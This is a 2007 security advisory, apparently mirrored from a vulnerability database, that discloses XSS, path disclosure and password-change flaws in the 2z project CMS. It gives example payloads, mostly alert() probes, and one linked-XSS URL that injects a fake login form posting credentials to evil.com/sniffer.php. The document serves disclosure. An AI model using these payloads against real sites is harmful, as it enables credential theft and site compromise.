Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18759
HistoryDec 28, 2007 - 12:00 a.m.

2z-project 0.9.6.1 Multiple Security Vulnerabilities

2007-12-2800:00:00
vulners.com
51

Digital Security Research Group [DSecRG] Advisory

Name: 2z project
Systems Affected: 2z project 0.9.6.1
Vendor URL: http://2z-project.ru
Authors: Alexandr Polyakov, Stas Svistunovich
Digital Security Reasearch Group [DSecRG] (research [at] dsec [dot] ru)
Reported: 27.12.2007
Vendor response: 27.12.2007
Date of Public Advisory: 28.12.2007

Description


2z system has multiple security vulnerabilities:

  1. Stored XSS
  2. Linked XSS
  3. Image XSS
  4. Path disclosure
  5. Vulnerable Password changing algorithm

Details


  1. Multiple Stored XSS

1.1 Vulnerability in script http://[server]/[installdir]/?action=addnews in post parameters:

parameter name = contentshort
parameter name = contentfull

Example:

contentshort=<script>alert('DSecRG XSS')</script>
contentfull=<script>alert('DSecRG XSS')</script>

1.2 Vulnerability in script http://[server]/[installdir]/2z/admin.php?mod=pm&action=write

parameter name = content

Example:

content=<script>alert('DSecRG XSS')</script>


  1. Linked XSS Vulnerability in page index.php.
    Working only if user not logged in. So it can be used for Phishing (see Example).

Template /templates/default/usermenu.tpl have vulnetability parameter "referer".
This template included to index.php, so it can be used for Phishing.

Source code of usermenu.tpl:

<form name="login" method="post" action="" id="login">
<input type="hidden" name="referer" value="{request_uri}" /> <– html code injected into {request_uri}
<input type="hidden" name="action" value="dologin" />

<input onfocus="if (!set_login){set_login=1;this.value='';}" value="{l_name}" class="mw_login_form" type="text" name="username" maxlength="60" size="25" />

<input onfocus="if(!set_pass){set_pass=1;this.value='';}" value="{l_password}" class="mw_login_form" type="password" name="password" maxlength="20" size="25" />

</from>

Example:

http://[server]/[installdir]/?"/><form/name="login"/method="post"/action="http://evil.com/sniffer.php&quot;/id=&quot;login&quot;&gt;&lt;input/type=&quot;hidden&quot;/name=&quot;referer&quot;/value=&quot;
http://[server]/[installdir]/index.php?"/><form/name="login"/method="post"/action="http://evil.com/sniffer.php&quot;/id=&quot;login&quot;&gt;&lt;input/type=&quot;hidden&quot;/name=&quot;referer&quot;/value=&quot;


  1. Image XSS Vulnetability in page /2z/?action=profile

Attacker can upload avatar and photo contained a XSS code.

Vulnerable parameters: newavatar, newphoto

For more information see http://www.dsec.ru/about/articles/web_xss/ (in russian)


  1. Path disclosure

By exploiting this issue, an attacker may gain sensitive information on the directory
structure of the server machine, which allows for further attacks against the site.

Example:

http://[server]/[installdir]/index.php?template=test
http://[server]/[installdir]/?year=1234&month=06


  1. Password changing vulnerabiluity

Old password not needed to change password.


About


Digital Security is leading IT security company in Russia, providing information
security consulting, audit and penetration testing services, risk analysis and
ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards.
Digital Security Research Group focuses on web application and database security
problems with vulnerability reports, advisories and whitepapers posted regularly
on our website.

Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)